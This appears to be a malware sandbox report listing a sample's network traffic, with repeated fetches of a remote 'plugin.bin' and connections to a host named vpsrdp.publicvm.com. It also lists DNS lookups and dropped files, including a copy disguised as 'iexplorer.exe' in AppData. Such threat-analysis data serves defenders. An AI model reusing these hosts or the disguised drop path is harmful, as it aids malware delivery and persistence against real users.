      GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
       8.1kB
       16
      14
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
       8.1kB
       16
      14
    • 204.79.197.200:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
       8.1kB
       16
      14
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      104 B
       2
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      260 B
       5
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      1.9kB
       17.7kB
       24
      20

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.4kB
       24.2kB
       36
      32

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       35
      31

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       33
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.9kB
       29
      25

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.4kB
       24.2kB
       36
      32

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       29
      25

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       33
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       27
      23

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       35
      31

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.4kB
       24.2kB
       36
      32

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      104 B
       2
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      208 B
       4
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.9kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.0kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      992 B
       287 B
       6
      4

      HTTP Request

      GET https://myhost.com/plugin.bin
    • 172.67.177.125:443
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
    • 8.8.8.8:53
      149.220.183.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      149.220.183.52.in-addr.arpa

    • 8.8.8.8:53
      79.190.18.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      79.190.18.2.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
       151 B
       1
      1

      DNS Request

      g.bing.com

      DNS Response

      204.79.197.237
      13.107.21.237

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      237.197.79.204.in-addr.arpa
      dns
      73 B
       143 B
       1
      1

      DNS Request

      237.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      133.32.126.40.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      133.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      129.61.62.23.in-addr.arpa
      dns
      71 B
       135 B
       1
      1

      DNS Request

      129.61.62.23.in-addr.arpa

    • 8.8.8.8:53
      58.99.105.20.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      58.99.105.20.in-addr.arpa

    • 8.8.8.8:53
      vpsrdp.publicvm.com
      dns
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      65 B
       95 B
       1
      1

      DNS Request

      vpsrdp.publicvm.com

      DNS Response

      139.99.66.103

    • 8.8.8.8:53
      myhost.com
      dns
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      56 B
       88 B
       1
      1

      DNS Request

      myhost.com

      DNS Response

      172.67.177.125
      104.21.75.144

    • 8.8.8.8:53
      125.177.67.172.in-addr.arpa
      dns
      73 B
       135 B
       1
      1

      DNS Request

      125.177.67.172.in-addr.arpa

    • 8.8.8.8:53
      67.169.217.172.in-addr.arpa
      dns
      73 B
       111 B
       1
      1

      DNS Request

      67.169.217.172.in-addr.arpa

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      183.59.114.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      183.59.114.20.in-addr.arpa

    • 8.8.8.8:53
      198.187.3.20.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      198.187.3.20.in-addr.arpa

    • 8.8.8.8:53
      48.229.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      48.229.111.52.in-addr.arpa

    • 8.8.8.8:53
      tse1.mm.bing.net
      dns
      62 B
       173 B
       1
      1

      DNS Request

      tse1.mm.bing.net

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      138.201.86.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      138.201.86.20.in-addr.arpa

    • 8.8.8.8:53
      vpsrdp.publicvm.com
      dns
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      65 B
       95 B
       1
      1

      DNS Request

      vpsrdp.publicvm.com

      DNS Response

      139.99.66.103

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YB09K3UP\plugin[1].htm
      Filesize

      167B

      MD5

      0104c301c5e02bd6148b8703d19b3a73

      SHA1

      7436e0b4b1f8c222c38069890b75fa2baf9ca620

      SHA256

      446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f

      SHA512

      84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

      Download Submit

    • C:\Users\Admin\AppData\Roaming\555F1D06\60D1F555k
      Filesize

      33B

      MD5

      106032725afc908f7d5e6aad000e68f2

      SHA1

      f118e123d0eafde21cff36bece9bad13eeb46ec8

      SHA256

      5aff0f50c17941e48254aceb70587ff5f877a27e989aec6bf464ae63df87982c

      SHA512

      53593b629ee8d7d8ee7cf00ac01ec3331209fae1c7ef4c3f03b5bf1f2e80b7cf2deebc4ec965a426353cb41334ca858f17423234b83f62f40116bed389503c58

      Download Submit

    • C:\Users\Admin\AppData\Roaming\555F1D06\iexplorer.exe
      Filesize

      476KB

      MD5

      62b12477a3468dc789f91d8fd9e2ba8e

      SHA1

      5f681b5b7d9432215b593c2f7d3131175dec3da5

      SHA256

      c92352d38a526cf8d4e5a1ea0c118a37dd0c5abab846086f7fc760fbc9e54ed6

      SHA512

      3a89228bd1f3d6ab6b01788d191101d7e5984696fcead5e9a5a67560a033a93cd28e90de44811951a072a13761c02a82aed2b78370ff6a801a67123e4d86e787

      Download Submit

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.